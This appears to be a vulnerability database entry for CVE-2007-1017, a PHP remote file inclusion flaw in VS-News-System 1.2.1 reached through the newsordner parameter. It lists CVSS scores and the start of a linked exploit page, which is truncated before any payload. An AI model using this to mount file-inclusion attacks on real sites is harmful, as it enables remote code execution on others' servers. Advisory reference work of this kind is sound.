9.3
CVSSv2

CVE-2007-1017

Published: 21/02/2007 Updated: 11/10/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

PHP remote file inclusion vulnerability in show_news_inc.php in VirtualSystem VS-News-System 1.2.1 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the newsordner parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

virtualsystem vs-news-system

Exploits

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>VS-News-System <= V121 (newsordner) Remote File Include Exploit</title> <script language="JavaScript"> //'=============================================================================================== //'[Scri ...